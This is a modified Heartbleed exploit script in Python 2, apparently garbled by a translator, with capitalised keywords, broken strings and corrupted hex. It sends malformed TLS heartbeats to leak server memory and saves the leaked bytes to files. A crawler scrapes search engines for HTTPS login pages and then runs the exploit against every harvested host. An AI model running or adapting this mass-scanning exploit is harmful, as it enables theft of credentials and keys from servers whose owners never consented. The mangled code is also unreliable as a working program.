modified ssltest.py

1. Import SYS
2. Import struct
3. Import socket
4. Import time
5. Import Select
6. Import Re
7. Import urllib2
8. from urlparse Import urlparse
9.  
10. def h2bin ( x ):
11. return x . replace ( '' , '' ). replace ( '\ N' , '' ). decode ( 'hex' )
12.  
13. hello = h2bin ( '' '
14. 16 03 02 00 dc 01 00 00 d8 03 02 53
15. 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
16. bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
17. 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
18. 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
19. c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
20. c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
21. c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
22. c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
23. 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
24. 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
25. 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
26. 0,006,000,700,140,015 0,004,000,500,120,013
27. 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
28. 00 0f 00 01 01
29. '' ' )
30.  
31. HB = h2bin ( '' '
32. 1803020003
33. 014000
34. '' ' )
35.  
36. def hexdump ( s ):
37. for b in xrange ( 0 , len ( s ), 16 ):
38. lin = [ c for c in s [ b : b + 16 ]]
39. hxdat = '' . Join ( '% 02X' % ORD ( c ) for c in lin )
40. PDAT = '' . Join (( c if 32 <= ORD ( c ) <= 126 else '.' ) for c in lin )
41. Print '% 04x:%-48S% s' % ( b , hxdat , PDAT )
42. Print
43.  
44. def recvall ( s , length , timeout = 5 ):
45. EndTime = time . time () + timeout
46. RDATA = ''
47. REMAIN = length
48. while REMAIN > 0 :
49. RTIME = EndTime - time . time ()
50. if RTIME < 0 :
51. return None
52. r , w , e = Select . Select ([ s ], [], [], 5 )
53. if s in r :
54. Data = s . recv ( REMAIN )
55. # EOF?
56. if Not Data :
57. return None
58. RDATA + = Data
59. REMAIN - = len ( Data )
60. return RDATA
61.  
62. def recvmsg ( s ):
63. HDR = recvall ( s , 5 )
64. if HDR is None :
65. Print 'Unexpected EOF Receiving record header - Server Closed connection'
66. return None , None , None
67. typ , Ver , LN = struct . unpack ( '> BHH ' , HDR )
68. Pay = recvall ( s , LN , 10 )
69. if Pay is None :
70. Print 'Unexpected EOF Receiving record payload - Server Closed connection'
71. return None , None , None
72. Print '... received message: type =% d, Ver =% 04x, length =% d ' % ( typ , Ver , len ( Pay ))
73. return typ , Ver , Pay
74.  
75. def hit_hb ( s , eurl ):
76. s . send ( HB )
77. while True :
78. typ , Ver , Pay = recvmsg ( s )
79. if typ is None :
80. Print 'No Response received heartbeat, Server Likely Not Vulnerable'
81. return False
82.  
83. if typ == 24 :
84. Print 'Received heartbeat Response:'
85. hexdump ( Pay )
86. if len ( Pay ) > 3 :
87. ​​Print 'WARNING:! Data Server returned More than it Should - Server is Vulnerable'
88. f = Open ( eurl , 'w ' )
89. f . Write ( Pay )
90. f . Close ()
91. else :
92. Print 'Server Processed Malformed heartbeat, but did Not return any Extra Data'.
93. return True
94.  
95. if typ == 21 :
96. Print 'Received Alert:'
97. hexdump ( Pay )
98. Print 'Server returned Error, Likely Not Vulnerable'
99. return False
100.  
101. def SSLTEST ( eurl ):
102.  
103. s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
104. Print '... Connecting to% s' % eurl
105. SYS . stdout . flush ()
106. s . Connect (( eurl , 443 ))
107. Print 'Sending Client Hello ...'
108. SYS . stdout . flush ()
109. s . send ( hello )
110. Print 'Waiting for Server Hello ...'
111. SYS . stdout . flush ()
112. while True :
113. typ , Ver , Pay = recvmsg ( s )
114. if typ == None :
115. Print '. Server Closed connection without Sending Server Hello'
116. return
117. . # Look for Server hello DONE message
118. if typ == 22 and ORD ( Pay [ 0 ]) == 0x0E :
119. break
120.  
121. Print 'Sending heartbeat Request ...'
122. SYS . stdout . flush ()
123. s . send ( HB )
124. hit_hb ( s , eurl )
125.  
126. # Proxy_support = urllib2.ProxyHandler ({'http': 'http://127.0.0.1:8087'}) # proxy serve
127.  
128. # opener = urllib2.build_opener (proxy_support, urllib2.HTTPHandler)
129. # urllib2.install_opener (opener)
130. headers = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19' }
131.  
132. def main ():
133. Print 'started crawling, please wait'
134. for x in Range ( 0 , 500 , 10 ):
135. f = Open ( "link.txt" , 'a' )
136. URL = "https://www.google .com / search q = inurl:? https://+ login & start =% d " % x # Google search
137. # URL = "http://www.baidu.com/ # wd = inurl: https://+ Login & pn =% d "% x # Baidu search
138. # URL = "https://www.bing.com/search?q=inurl:https://+ Login & first =% d"% x # Bing search
139. # URL = " http://www.sogou.com/web?query=inurl:https://&page =% d "% x # Sogou search
140. REQ = urllib2 . Request ( url = URL , headers = headers )
141. content = urllib2 . urlopen ( REQ .) Read ()
142. a = Re . findall ( r '(https:// * /.?)' , content )
143. b = list ( set ( a ))
144. for i in b :
145. O = urlparse ( i )
146. f . writelines ( O . netloc + '\ N' )
147. Print "has climbed Page% s" % ( x / 10 + 1 )
148. delay = 5
149. f . Close ()
150.  
151. f = Open ( "link.txt" , 'r' )
152. for line in f :
153. line = line . Strip ()
154. SSLTEST ( line )
155.  
156. if __ name__ == '__main__' :
157. main ()